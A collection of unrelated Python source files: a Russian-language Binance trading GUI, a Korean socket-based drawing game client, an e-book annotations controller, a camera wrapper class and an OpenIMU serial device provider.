app.Tree_PI.item(4, values=('котируемая',mylistFT[mm]['quoteAsset']))
app.Tree_PI.item(5, values=('маржа',mylistFT[mm]['marginAsset']))
app.Tree_PI.item(6, values=('тип',mylistFT[mm]['contractType']))
mylist10 = []
mylist10 = mylistFT[mm]['filters']
if len(mylist10)>0:
prSt = float(mylist10[0]['tickSize'])
orLSS= float(mylist10[1]['stepSize'])
grSt = 16
grOW = 1000
grOW = float(mylist10[2]['maxQty'])
Lo=0
grSmb = SP
app.Tree_PI.item(7, values=('минЦена',mylist10[0]['minPrice']))
app.Tree_PI.item(8, values=('максЦена',mylist10[0]['maxPrice']))
app.Tree_PI.item(9, values=('шагЦены',mylist10[0]['tickSize']))
app.Tree_PI.item(10, values=('максОбъем',mylist10[2]['maxQty']))
app.Tree_PI.item(11, values=('шагОрдера',mylist10[1]['stepSize']))
BnFAcc = bot.futuresAccount()
#print(BnFAcc)
ss = 'FUTURES positions:\n'
if len(BnFAcc)>0:
BnFAcc1 = BnFAcc['positions']
if len(BnFAcc1)>0:
for mm in range(len(BnFAcc1)):
BnFAcc10 = BnFAcc1[mm]
if BnFAcc10['symbol']==grSmb:
#print (grSmb)
Lvrg=BnFAcc10['leverage']
Lvrg_Tmp = Lvrg
#print(Lvrg)
app.CB_Lvrg.set(Lvrg)
app.label_OrdAss.config(text = 'USDT x ' + str(Lvrg))
Isl=BnFAcc10['isolated']
if Isl == True:
app.CB_MrgT.set('ISOLATED')
MrgT='ISOLATED'
MrgT_Tmp=MrgT
elif Isl==False:
app.CB_MrgT.set('CROSSED')
MrgT='CROSSED'
MrgT_Tmp=MrgT
#print(bot.symbolLeverage(symbol=grSmb))
#print(bot.symbolMarginType(symbol=grSmb))
self.label_PI.config(text = tstr)
def CB_MrgT_changed(self,event):
global MrgT_Tmp
if MS == 'FUTURES':
MrgT_Tmp = app.CB_MrgT.get()
def CB_Lvrg_changed(self,event):
global Lvrg_Tmp
Lvrg_Tmp = app.CB_Lvrg.get()
def click_button_MrLvSet(self):
#global Lvrg
#global MrgT
global Should_Chng
Should_Chng=False
MrgT_Tmp_B=False
Msg_Tmp=0
if MrgT_Tmp == 'ISOLATED':
MrgT_Tmp_B=True
else:
MrgT_Tmp_B=False
if MS == 'FUTURES':
BnFAcc=bot.userOpenOrders()
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if str(BnFAcc1['symbol'])==grSmb:
Should_Chng=False
Msg_Tmp=3
BnFAcc = bot.futuresAccount()
#print(BnFAcc)
if len(BnFAcc)>0:
BnFAcc1 = BnFAcc['positions']
if len(BnFAcc1)>0:
for mm in range(len(BnFAcc1)):
BnFAcc10 = BnFAcc1[mm]
#if BnFAcc10['symbol']==grSmb:
# print(BnFAcc10['positionAmt'])
# print (float(BnFAcc10['leverage']),float(Lvrg_Tmp),BnFAcc10['isolated'],MrgT_Tmp_B,MrgT_Tmp)
if BnFAcc10['symbol']==grSmb and (float(BnFAcc10['positionAmt'])>0 or float(BnFAcc10['positionAmt'])<0):
Msg_Tmp=1
Should_Chng=False
elif BnFAcc10['symbol']==grSmb and float(BnFAcc10['positionAmt'])==0 and float(BnFAcc10['leverage']) == float(Lvrg_Tmp) and BnFAcc10['isolated'] == MrgT_Tmp_B and Msg_Tmp==0:
Msg_Tmp=2
Should_Chng=False
elif BnFAcc10['symbol']==grSmb and float(BnFAcc10['positionAmt'])==0 and (float(BnFAcc10['leverage']) != float(Lvrg_Tmp) or BnFAcc10['isolated'] != MrgT_Tmp_B) and Msg_Tmp==0:
Should_Chng=True
if BnFAcc10['isolated'] != MrgT_Tmp_B and float(BnFAcc10['leverage']) == float(Lvrg_Tmp):
Msg_Tmp=4
elif BnFAcc10['isolated'] == MrgT_Tmp_B and float(BnFAcc10['leverage']) != float(Lvrg_Tmp):
Msg_Tmp=5
elif BnFAcc10['isolated'] != MrgT_Tmp_B and float(BnFAcc10['leverage']) != float(Lvrg_Tmp):
Msg_Tmp=6
if Should_Chng==False and Msg_Tmp==1:
messagebox.showinfo("Set changes decline", "Есть открытые позиции по данной паре " + grSmb)
elif Should_Chng==False and Msg_Tmp==2:
messagebox.showinfo("Set changes decline", "Нет изменений по данной паре " + grSmb)
elif Should_Chng==False and Msg_Tmp==3:
messagebox.showinfo("Set changes decline", "Есть открытые ордера по данной паре " + grSmb)
#print (Should_Chng)
#print (Lvrg,Lvrg_Tmp,MrgT,MrgT_Tmp)
if Should_Chng==True:
if Msg_Tmp==5 or Msg_Tmp==6:
bot.futuresChLeverage(symbol=grSmb,leverage=int(Lvrg_Tmp))
messagebox.showinfo("Set changes leverage", "Плечо по данной паре " + grSmb + "установлено" + Lvrg_Tmp)
sys_msg = ' Кредитное плечо пары ' + grSmb + ' установлено x' + Lvrg_Tmp
app.Sys_Msg(text1=sys_msg)
if Msg_Tmp==4 or Msg_Tmp==6:
bot.futuresChMarginType(symbol=grSmb,marginType=MrgT_Tmp)
messagebox.showinfo("Set changes margin", "Маржа по данной паре " + grSmb + "установлена" + MrgT_Tmp)
sys_msg = ' Режим маржи пары ' + grSmb + ' установлен:' + MrgT_Tmp
app.Sys_Msg(text1=sys_msg)
def market_selected(self,choice):
global MS
MS = choice
if MS == 'SPOT':
app.CB_MrgT['values'] = ('NONE')
app.CB_MrgT.current(0)
MrgT='NONE'
app.CB_Lvrg['values'] = ('1')
app.CB_Lvrg.current(0)
elif MS == 'FUTURES':
app.CB_MrgT['values'] = ('ISOLATED', 'CROSSED')
app.CB_MrgT.current(0)
MrgT='ISOLATED'
app.CB_Lvrg['values'] = ('1','2','3','4','5','6','7','8','9','10','11','12','13','14','15','16','17','18','19','20')
app.CB_Lvrg.current(0)
self.PL_make()
def graph_selected(self,choice):
global GS
GS = choice
wh = root.winfo_height()
ww = root.winfo_width()
if GS=='TICK':
app.graph_1.place(x=10,y=150,width=ww-490,height=wh-320)
app.graph_Sm.place_forget()
app.graph_Cn.place_forget()
app.graph_VV.place_forget()
app.graph_BTCD.place_forget()
elif GS=='CANDLE 1m' or GS=='CANDLE 5m' or GS=='CANDLE 5m' or GS == 'CANDLE 15m' or GS == 'CANDLE 30m' or GS == 'CANDLE 1h' or GS == 'CANDLE 4h' or GS == 'CANDLE 1d':
app.graph_1.place_forget()
app.graph_Sm.place_forget()
app.graph_Cn.place(x=10,y=150,width=ww-490,height=wh-320)
app.graph_VV.place(x=10,y=wh-300,width=ww-490,height=100)
app.graph_BTCD.place(x=10,y=180,width=ww-490,height=100)
elif GS=='CANDLE SUMM':
app.graph_1.place_forget()
app.graph_Cn.place_forget()
app.graph_VV.place_forget()
app.graph_BTCD.place_forget()
app.graph_Sm.place(x=10,y=150,width=ww-490,height=wh-320)
def pair_selected(self,choice):
global MPS
MPS = choice
if choice == 'Все':
MPS = ''
elif choice == 'USDT':
MPS = 'USDT'
self.PL_make()
def PL_make(self):
if MS == 'SPOT':
if MPS == '':
app.CB_P["values"] = mylist1
elif MPS == 'USDT':
mylist10 = []
for mm in range(len(mylistSP)):
if mylistSP[mm]['quoteAsset'] == 'USDT':
mylist10.append(mylistSP[mm]['symbol'])
app.CB_P["values"] = mylist10
elif MS == 'FUTURES':
if MPS == '':
app.CB_P["values"] = mylist2
elif MPS == 'USDT':
mylist10 = []
for mm in range(len(mylistFT)):
if mylistFT[mm]['quoteAsset'] == 'USDT':
mylist10.append(mylistFT[mm]['symbol'])
app.CB_P["values"] = mylist10
#______________MAIN WINDOW GUI END
#______________MAIN WINDOW GUI LOADING BEGIN
#__Start CODE
root = Tk()
app = gui(root)
root.title('iTrader. Торговля на Binance')
root.protocol("WM_DELETE_WINDOW", close_window)
root.geometry("1400x850+150+100")
#__Main Menu
menu = Menu(root)
new_item=Menu(menu, tearoff=0)
new_item.add_command(label='Ключи',command=clicked_Bnacc)
new_item.add_separator()
new_item.add_command(label='Балансы',command=clicked_blns)
new_item.add_command(label='Ордера',command=clicked_Ordrs)
menu.add_cascade(label='Аккаунт', menu=new_item)
root.config(menu=menu)
#__Connecting Binance
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str = time_local_time.strftime("[%d.%m.%Y %H:%M:%S] ")
sys_msg = str(time_local_str) + ' Запуск программы. Подключение к Binance ...'
app.text_Sys.insert(1.0, sys_msg)
#print(bot.time())
myListST = bot.time()
sss23 = myListST['serverTime']/1000
sss24 = datetime.datetime.fromtimestamp(sss23)
sss25=sss24.strftime("[%d.%m.%Y %H:%M:%S] ")
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str=time_local_time.strftime("[%d.%m.%Y %H:%M:%S] ")
sys_msg = '\n' + str(time_local_str) + ' Binance время: ' + str(sss25)
app.text_Sys.insert(END, sys_msg)
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str=time_local_time.strftime("[%d.%m.%Y %H:%M:%S] ")
sys_msg = '\n' + str(time_local_str) + ' Считываю рынки Binance ...'
app.text_Sys.insert(END, sys_msg)
#__start reading Markets.SPOT
myTuplEI1 = bot.exchangeInfo()
app.CB_P["values"]=()
mylist1 = []
mylist10 = []
if len(myTuplEI1)>0:
mylistSP = myTuplEI1['symbols']
if len(mylistSP)>0:
for mm in range (len(mylistSP)):
mylist1.append(mylistSP[mm]['symbol'])
#print(mylist1[mm]['symbol'])
if MPS == 'USDT':
if mylistSP[mm]['quoteAsset'] == 'USDT':
mylist10.append(mylistSP[mm]['symbol'])
if mylistSP[mm]['symbol'] == grSmb and MS == 'SPOT':
myListSmbFlt = []
myListSmbFlt = mylistSP[mm]['filters']
if len(myListSmbFlt)>0:
prSt = float(myListSmbFlt[0]['tickSize'])
grOW = float(myListSmbFlt[5]['maxQty'])
#print (prSt, grOW)
#__start reading Markets.FUTURES
myTuplEI2 = bot.futuresExchangeInfo()
mylist2 = []
mylist20 = []
if len(myTuplEI2)>0:
mylistFT = myTuplEI2['symbols']
if len(mylistFT)>0:
for mm in range (len(mylistFT)):
mylist2.append(mylistFT[mm]['symbol'])
if MPS == 'USDT':
if mylistFT[mm]['quoteAsset'] == 'USDT':
mylist20.append(mylistFT[mm]['symbol'])
if mylistFT[mm]['symbol'] == grSmb and MS == 'FUTURES':
myListSmbFlt = []
myListSmbFlt = mylistFT[mm]['filters']
if len(myListSmbFlt)>0:
prSt = float(myListSmbFlt[0]['tickSize'])
grOW = float(myListSmbFlt[2]['maxQty'])
#print (prSt, grOW)
if MS =='SPOT':
if MPS == 'USDT':
app.CB_P["values"] = mylist10
else:
app.CB_P["values"] = mylist1
elif MS == 'FUTURES':
if MPS == 'USDT':
app.CB_P["values"] = mylist20
else:
app.CB_P["values"] = mylist2
app.CB_P.set=grSmb
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str=time_local_time.strftime("[%d.%m.%Y %H:%M:%S] ")
sys_msg = '\n' + str(time_local_str) + ' Рынки Binance считаны.'
app.text_Sys.insert(END, sys_msg)
#__"BNBUSDT - trades"
myTuplTr = ('trades', bot.trades(symbol=grSmb, limit=1)) #Tupl
myDicGr1 = myTuplTr[1][0] #dict
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str=time_local_time.strftime("[%d.%m.%Y %H:%M:%S] ")
sys_msg = '\n' + str(time_local_str) + ' Программа готова к работе!'
app.text_Sys.insert(END, sys_msg)
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str=time_local_time.strftime("[%d.%m.%Y %H:%M:%S] ")
sys_msg = '\n' + str(time_local_str) + ' Текущий график: ' + GS
sys_msg += '\n' + str(time_local_str) + ' Текущий рынок: ' + MS + '. Текущие пары: ' + MPS
sys_msg += '\n' + str(time_local_str) + ' Текущая пара: ' + grSmb
app.text_Sys.insert(END, sys_msg)
app.text_Sys.yview(END)
if os.path.isfile('iTrader.cfg') == False:
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str=time_local_time.strftime("[%d.%m.%Y %H:%M:%S] ")
sys_msg = '\n' + str(time_local_str) + ' Файл настроек отсуствует. Необходимо ввести API_KEYS в меню Account для работы с программой'
else:
if os.stat("iTrader.cfg").st_size == 0:
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str=time_local_time.strftime("[%d.%m.%Y %H:%M:%S] ")
sys_msg = '\n' + str(time_local_str) + ' Файл настроек пуст. Необходимо ввести API_KEYS в меню Account для работы с программой'
else:
my_file_Account = open("iTrader.cfg", "r")
l = 0
while True:
sss00 = my_file_Account.readline()
if not sss00:
break
if l == 0:
API_KEY_s = sss00.replace ("\n", "")
elif l == 1:
API_SECRET_s = sss00.replace ("\n", "")
l +=1
my_file_Account.close()
if API_KEY_s == '' or API_SECRET_s =='':
l = 0
if l >= 2:
isAcc = True
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str=time_local_time.strftime("[%d.%m.%Y %H:%M:%S] ")
sys_msg = '\n' + str(time_local_str) + ' Файл настроек считан успешно.'
elif l < 2:
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str=time_local_time.strftime("[%d.%m.%Y %H:%M:%S] ")
sys_msg = '\n' + str(time_local_str) + ' Файл настроек считан с ошибками. Необходимо ввести API_KEYS в меню Account для работы с программой'
app.text_Sys.insert(END, sys_msg)
app.text_Sys.yview(END)
if isAcc == True:
#print(API_SECRET_s)
#print(API_KEY_s)
bot = Binance(API_KEY=API_KEY_s, API_SECRET=API_SECRET_s)
#__start reading acc
myListAcc = bot.account()
#print(bot.account())
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str=time_local_time.strftime("[%d.%m.%Y %H:%M:%S] ")
sys_msg = "\n" + str(time_local_str) + " Binance SPOT аккаунт. Разрешения: " + str(myListAcc['permissions']) + '. Можно внести: ' + str(myListAcc['canDeposit'])
sys_msg += str(". Можно вывести: ") + str(myListAcc['canWithdraw'])
app.text_Sys.insert(END, sys_msg)
app.text_Sys.yview(END)
BnFAcc = bot.ftrsGetPositionSide()
#print (BnFAcc)
if BnFAcc['dualSidePosition']==True:
app.label_HM.config(text="Position Mode: Both")
else:
app.label_HM.config(text="Position Mode: One-way")
#______________MAIN WINDOW GUI LOADING END
#______________MAIN WINDOW GUI EVENTS BEGIN
def config(event):
global grH
global grW
if event.widget == root and ep==False:
app.label_BU.place(x=event.width-210, y=10, width=200, height=40)
app.button_2.place(x=event.width-260, y=10, width=50, height=40)
app.button_AB.place(x=event.width-260, y=60, width=50, height=50)
app.label_PnL.place(x=event.width-210, y=60, width=200, height=50)
app.label_HM.place(x=event.width-210, y=120, width=200, height=40)
app.label_7.place(x=10, y=10, width=event.width-20, height=event.height-20)
app.Tree_Pos.place(x=210, y=10, width=event.width-490, height=100)
app.Tree_Pos_VScrl.place(height=100,width=10,x=event.width-280,y=10)
app.label_Grpf.place(width=event.width-440, height=event.height-320,x=10,y=150)
app.label_Ord.place(height=event.height-320,width=200,x=event.width-420,y=150)
app.label_Cmd.place(height=event.height-160,width=200,x=event.width-210,y=150)
app.label_PI.place(height=event.height-320-390,width=200,x=0,y=120)
app.Tree_PI.place(height=event.height-320-390,width=185,x=0,y=120)
app.Tree_PI_VScrl.place(height=event.height-320-390,width=10,x=185,y=120)
app.label_CmdOrd.place(height=event.height-300-(event.height-710),width=198,x=0,y=130+(event.height-320-390))
app.text_Sys.place(height=150,width=event.width-440,x=10,y=event.height-160)
app.text_Sys_Scrl.place(height=150,width=10,x=event.width-430,y=event.height-160)
app.label_P.place(x=event.width-210,y=150)
app.CB_MrgT.place(x=event.width-210,y=170)
app.CB_Lvrg.place(x=event.width-110,y=170)
app.button_MrLvSet.place(x=event.width-65,y=170)
app.CB_P.place(x=event.width-210,y=200)
app.MPSL.place(x=event.width-210,y=230)
app.SPSL.place(x=event.width-110,y=230)
if GS=='TICK':
app.graph_1.place(width=event.width-490,height=event.height-320,x=10,y=150)
elif GS=='CANDLE 1m' or GS=='CANDLE 5m' or GS=='CANDLE 5m' or GS == 'CANDLE 15m' or GS == 'CANDLE 30m' or GS == 'CANDLE 1h' or GS == 'CANDLE 4h' or GS == 'CANDLE 1d':
app.graph_Cn.place(width=event.width-490,height=event.height-320,x=10,y=150)
app.graph_VV.place(x=10,y=event.height-300,height=100,width=event.width-490)
app.graph_BTCD.place(x=10,y=180,height=100,width=event.width-490)
elif GS=='CANDLE SUMM':
app.graph_Sm.place(width=event.width-490,height=event.height-320,x=10,y=150)
app.graph_Tb.place(x=10,y=150,height=30,width=event.width-490)
app.graph_Td.place(x=10,y=event.height-200,height=30,width=event.width-490)
if Ord_Zm==False:
app.graph_2.place(x=event.width-420,y=150,height=event.height-320,width=200)
else:
app.graph_Zm.place(x=event.width-420,y=150,height=event.height-320,width=200)
app.Scale_TP.place(height=(event.height-320-60)/2-15,width=70,x=event.width-480,y=180)
app.Scale_SL.place(height=(event.height-320-60)/2-15,width=70,x=event.width-480,y=150+45+(event.height-320-60)/2)
app.PSDvar_L.place(height=30,width=30,x=event.width-480,y=150+15+(event.height-320-60)/2)
app.PSDvar_S.place(height=30,width=30,x=event.width-480+30,y=150+15+(event.height-320-60)/2)
app.button_PTP.place(height=30,width=45,x=event.width-480,y=150)
app.button_PTPR.place(height=30,width=15,x=event.width-435,y=150)
app.button_PSL.place(height=30,width=45,x=event.width-480,y=event.height-200)
app.button_PSLR.place(height=30,width=15,x=event.width-435,y=event.height-200)
app.button_Ord.place(x=event.width-420,y=150,height=30,width=100)
app.button_OrdTmr.place(x=event.width-320,y=150,height=30,width=100)
grH = event.height-320
grW = event.width-340
root.bind("<Configure>", config)
#______________MAIN WINDOW GUI EVENTS END
root.mainloop()
|
2021-11-21-cmind-drawncode.py
|
import threading, socket
from PyQt5.QtWidgets import *
from PyQt5.QtGui import *
from PyQt5.QtCore import *
import sys
from worrd import gud
def recvMsg(soc): #좌표 받음
while True:
data = soc.recv(15)
msg = data.decode()
a=msg.split(',')
ex.sok(a[0],a[1],a[2],a[3])
soc.close()
class Client:
ip = 'localhost'
port = 4444
def __init__(self):
self.client_soc = None
def conn(self):
self.client_soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.client_soc.connect((Client.ip, Client.port))
def run(self):
self.conn()
t2 = threading.Thread(target=recvMsg, args=(self.client_soc,))
t2.start()
def main():
c = Client()
c.run()
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket .connect(("localhost", 4444))
class MyApp(QMainWindow): #창
def __init__(self):
super().__init__()
self.image = QImage(QSize(400, 400), QImage.Format_RGB32)
self.image.fill(Qt.white)
self.brush_size = 5
self.brush_color = Qt.black
self.initUI()
self.show()
def initUI(self): #창 설정
self.setWindowTitle('Simple Painter')
self.setGeometry(700, 200, 400, 400)
a = gud()
button = QPushButton(a[1], self)
button.move(150, 0)
self.line_edit = QLineEdit(self)
self.line_edit.move(25, 365)
self.button = QPushButton(self)
self.button.move(200, 365)
self.button.setText('정답')
self.button.clicked.connect(self.button_event)
def button_event(self): #정답버튼 눌렀을때
text = self.line_edit.text()
ekq = gud()
if text == ekq[0]:
QMessageBox.about(self, "정답", "정답")
else:
QMessageBox.about(self, "오답", "오답")
def paintEvent(self, e):
canvas = QPainter(self)
canvas.drawImage(self.rect(), self.image, self.image.rect())
def sok(self, q,w,e,r):
painter = QPainter(self.image)
painter.setPen(QPen(self.brush_color, self.brush_size, Qt.SolidLine, Qt.RoundCap))
painter.drawLine(int(q), int(w),int(e),int(r)) # (1칸전,현재) drawline(x1, y1, x2, y2)
self.update()
if __name__ == '__main__':
main()
app = QApplication(sys.argv)
ex = MyApp() #창
sys.exit(app.exec_())
client_socket.close()
|
controller.py
|
import io
import itertools
import re
import subprocess
from threading import Thread
from core.data_extractor import DataExtractor
from core.objects.annotation import Annotation
from core.utils import ends_with_slash
class AnnotationsPageController:
data_extractor: DataExtractor
def view_annotation(self, anno_id):
anno = self.data_extractor.get_tag(anno_id)
file = self.data_extractor.get_book_file(anno.BookId)
subpath = file.get_subpath()
root_path = self.data_extractor.path
page_num = int(re.findall("page=(\d+)", anno.Begin)[0]) + 1
command = ["evince", "-p", str(page_num), ends_with_slash(root_path)+subpath]
Thread(target=subprocess.check_call, args=[command], daemon=True).start()
def annotations_as_markdown(self, **k)-> io.BytesIO:
data = sorted(self.annotations(**k), key=lambda item: item.OID)
s = io.StringIO()
for item in data:
s.write(f"\n\n{item.Text}")
out = io.BytesIO()
out.write(s.getvalue().encode("utf-8"))
out.seek(0)
s.close()
return out
def annotations(self, tag=None, bookId=None, **k):
data = self.data_extractor.get_tags()
def filterFunc(item: Annotation):
bools = [True]
if tag:
bools.append(tag in item.TagName)
if bookId:
bools.append(item.BookId == int(bookId))
if item.Text == "Bookmark":
return False
return all(bools)
return list(filter(filterFunc, data))
def books(self, **k):
data = self.data_extractor.get_books()
annotations = self.annotations(tag="bm.quotation")
annotations_count = {}
key = lambda a: a.BookId
for bookId, group in itertools.groupby(
sorted(annotations, key=key), key=key
):
annotations_count[bookId] = len(list(group))
for item in data:
item.AnnotationsCount = annotations_count.get(item.OID, 0 )
return sorted(data, key=lambda item: -item.AnnotationsCount)
|
cameraClass.py
|
import cv2
import numpy as np
from time import sleep
from threading import Thread
class cameraClassPi:
def __init__(self):
from picamera import PiCamera
from picamera.array import PiRGBArray
# initialize the camera and stream
self.camera = PiCamera()
#self.camera.sensor_mode = 1
self.camera.resolution = (1280,720)
self.camera.framerate = 32
self.shutter_speed = self.camera.exposure_speed
self.start()
self.rawCapture = PiRGBArray(self.camera)
def stopP(self):
# stop preview
self.camera.stop_preview()
def start(self):
# indicate that the thread should be stopped
self.camera.start_preview(alpha=160)
def capture(self, path):
self.camera.capture(path)
def stop(self):
# indicate that the thread should be stopped
self.camera.close()
class cameraClassWeb:
def __init__(self, src=0):
# initialize the video camera stream and read the first frame
# from the stream
self.stream = cv2.VideoCapture(src)
(self.grabbed, self.frame) = self.stream.read()
# initialize the variable used to indicate if the thread should
# be stopped
self.stopped = False
def start(self):
# start the thread to read frames from the video stream
Thread(target=self.update).start()
return self
def takePicture(self, path):
cv2.imwrite(path, self.frame)
def update(self):
# keep looping infinitely until the thread is stopped
while True:
# if the thread indicator variable is set, stop the thread
if self.stopped:
return
# otherwise, read the next frame from the stream
(self.grabbed, self.frame) = self.stream.read()
def read(self):
# return the frame most recently read
return self.frame
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
|
uart_provider.py
|
import os
import re
import sys
import time
import json
import binascii
import math
# import asyncio
import datetime
import threading
import struct
from azure.storage.blob import BlockBlobService
from ...framework.utils import helper
from ...framework.utils import resource
from ..base import OpenDeviceBase
from ..configs.openimu_predefine import (
APP_STR, get_app_names
)
from ...framework.context import APP_CONTEXT
from ..decorator import with_device_message
from ...framework.configuration import get_config
from ..upgrade_workers import FirmwareUpgradeWorker
from ..upgrade_center import UpgradeCenter
class Provider(OpenDeviceBase):
'''
OpenIMU UART provider
'''
def __init__(self, communicator, *args):
super(Provider, self).__init__(communicator)
self.type = 'IMU'
self.server_update_rate = 50
self.is_logging = False
self.is_mag_align = False
self.bootloader_baudrate = 57600
self.device_info = None
self.app_info = None
self.app_config_folder = ''
self.parameters = None
self.enable_data_log = True
self.prepare_folders()
self.is_backup = False
self.is_restore = False
self.is_app_matched = False
self.connected = True
def prepare_folders(self):
'''
Prepare folders for data storage and configuration
'''
executor_path = resource.get_executor_path()
setting_folder_name = 'setting'
config_file_name = 'openimu.json'
data_folder_path = os.path.join(executor_path, 'data')
if not os.path.isdir(data_folder_path):
os.makedirs(data_folder_path)
# copy contents of app_config under executor path
self.setting_folder_path = os.path.join(
executor_path, setting_folder_name, 'openimu')
for app_name in get_app_names():
app_name_path = os.path.join(self.setting_folder_path, app_name)
app_name_config_path = os.path.join(
app_name_path, config_file_name)
if not os.path.isfile(app_name_config_path):
if not os.path.isdir(app_name_path):
os.makedirs(app_name_path)
app_config_content = resource.get_content_from_bundle(
setting_folder_name, os.path.join('openimu', app_name, config_file_name))
if app_config_content is None:
continue
with open(app_name_config_path, "wb") as code:
code.write(app_config_content)
def bind_device_info(self, device_access, device_info, app_info):
self._build_device_info(device_info)
self._build_app_info(app_info)
self.connected = True
return '# Connected {0} #\n\rDevice:{1} \n\rFirmware:{2}'\
.format('OpenIMU', device_info, app_info)
def _build_device_info(self, text):
'''
Build device info
'''
split_text = [x for x in text.split(' ') if x != '']
split_len = len(split_text)
pre_sn = split_text[3].split(':') if split_len == 4 else ''
serial_num = pre_sn[1] if len(pre_sn) == 2 else ''
self.device_info = {
'name': split_text[0],
'pn': split_text[1],
'firmware_version': split_text[2],
'sn': serial_num
}
def _build_app_info(self, text):
'''
Build app info
'''
# check if J1939 in text
app_version = text
can_indicator = '_J1939'
if can_indicator in app_version:
app_version = app_version.replace(can_indicator, '')
split_text = app_version.split(' ')
app_name = next(
(item for item in APP_STR if item in split_text), None)
if not app_name:
app_name = 'IMU'
self.is_app_matched = False
else:
self.is_app_matched = True
self.app_info = {
'app_name': app_name,
'version': text
}
def load_properties(self):
# Load config from user working path
local_config_file_path = os.path.join(os.getcwd(), 'openimu.json')
if os.path.isfile(local_config_file_path):
with open(local_config_file_path) as json_data:
self.properties = json.load(json_data)
return
# Load the openimu.json based on its app
app_name = self.app_info['app_name']
app_file_path = os.path.join(
self.setting_folder_path, app_name, 'openimu.json')
if not self.is_app_matched:
APP_CONTEXT.get_logger().warning(
('Failed to extract app version information from unit. The supported application list is {0}.').format(get_app_names()))
APP_CONTEXT.get_logger().warning(
'To keep runing, use IMU configuration as default.')
APP_CONTEXT.get_logger().warning(
'You can choose to place your json file under exection path if it is an unknown application.')
with open(app_file_path) as json_data:
self.properties = json.load(json_data)
def after_setup(self):
pass
def after_bootloader_switch(self):
self.communicator.serial_port.baudrate = self.bootloader_baudrate
def on_read_raw(self, data):
pass
def on_receive_output_packet(self, packet_type, data):
'''
Listener for getting output packet
'''
self.add_output_packet('stream', packet_type, data)
def get_log_info(self):
'''
Build information for log
'''
packet_rate = next(
(item['value'] for item in self.parameters if item['name'] == 'Packet Rate'), '100')
return {
"type": self.type,
"model": self.device_info['name'],
"logInfo": {
"pn": self.device_info['pn'],
"sn": self.device_info['sn'],
"sampleRate": packet_rate,
"appVersion": self.app_info['version'],
"imuProperties": json.dumps(self.properties)
}
}
def do_write_firmware(self, firmware_content):
upgrade_center = UpgradeCenter()
upgrade_center.register(
FirmwareUpgradeWorker(self.communicator, firmware_content))
upgrade_center.on('progress', self.handle_upgrade_process)
upgrade_center.on('error', self.handle_upgrade_error)
upgrade_center.on('finish', self.handle_upgrade_complete)
upgrade_center.start()
return upgrade_center.total
def get_device_connection_info(self):
return {
'modelName': self.device_info['name'],
'deviceType': self.type,
'serialNumber': self.device_info['sn'],
'partNumber': self.device_info['pn'],
'firmware': self.device_info['firmware_version']
}
# command list
def get_device_info(self, *args): # pylint: disable=invalid-name
'''
Get device information
'''
return {
'packetType': 'deviceInfo',
'data': [
{'name': 'Product Name',
'value': self.device_info['name']},
{'name': 'PN', 'value': self.device_info['pn']},
{'name': 'Firmware Version',
'value': self.device_info['firmware_version']},
{'name': 'SN', 'value': self.device_info['sn']},
{'name': 'App Version', 'value': self.app_info['version']}
]
}
def get_conf(self, *args): # pylint: disable=invalid-name
'''
Get json configuration
'''
return {
'packetType': 'conf',
'data': {
'outputs': self.properties['userMessages']['outputPackets'],
'inputParams': self.properties['userConfiguration']
}
}
@with_device_message
def get_params(self, *args): # pylint: disable=invalid-name
'''
Get all parameters
'''
command_line = helper.build_input_packet('gA')
result = yield self._message_center.build(command=command_line, timeout=3)
data = result['data']
if data:
self.parameters = data
yield {
'packetType': 'inputParams',
'data': data
}
yield {
'packetType': 'error',
'data': 'No Response'
}
@with_device_message
def get_param(self, params, *args): # pylint: disable=invalid-name
'''
Update paramter value
'''
command_line = helper.build_input_packet(
'gP', properties=self.properties, param=params['paramId'])
result = yield self._message_center.build(command=command_line)
data = result['data']
error = result['error']
if error:
yield {
'packetType': 'error',
'data': 'No Response'
}
if data:
yield {
'packetType': 'inputParam',
'data': data
}
yield {
'packetType': 'error',
'data': 'No Response'
}
@with_device_message
def set_params(self, params, *args): # pylint: disable=invalid-name
'''
Update paramters value
'''
for parameter in params:
command_line = helper.build_input_packet(
'uP', properties=self.properties,
param=parameter['paramId'],
value=parameter['value'])
result = yield self._message_center.build(command=command_line)
packet_type = result['packet_type']
data = result['data']
if packet_type == 'error':
yield {
'packetType': 'error',
'data': {
'error': data
}
}
if data > 0:
yield {
'packetType': 'error',
'data': {
'error': data
}
}
yield {
'packetType': 'success',
'data': {
'error': 0
}
}
@with_device_message
def set_param(self, params, *args): # pylint: disable=invalid-name
'''
Update paramter value
'''
try:
command_line = helper.build_input_packet(
'uP', properties=self.properties, param=params['paramId'], value=params['value'])
except:
yield {
'packetType': 'error',
'data': {
'error': params['paramId']
}
}
result = yield self._message_center.build(command=command_line)
error = result['error']
data = result['data']
if error:
yield {
'packetType': 'error',
'data': {
'error': data
}
}
yield {
'packetType': 'success',
'data': {
'error': data
}
}
@with_device_message
def reset_params(self, *args): # pylint: disable=unused-argument
'''
Reset params to default
'''
command_line = helper.build_input_packet('rD')
result = yield self._message_center.build(command=command_line, timeout=2)
error = result['error']
data = result['data']
if error:
yield {
'packetType': 'error',
'data': {
'error': error
}
}
yield {
'packetType': 'success',
'data': data
}
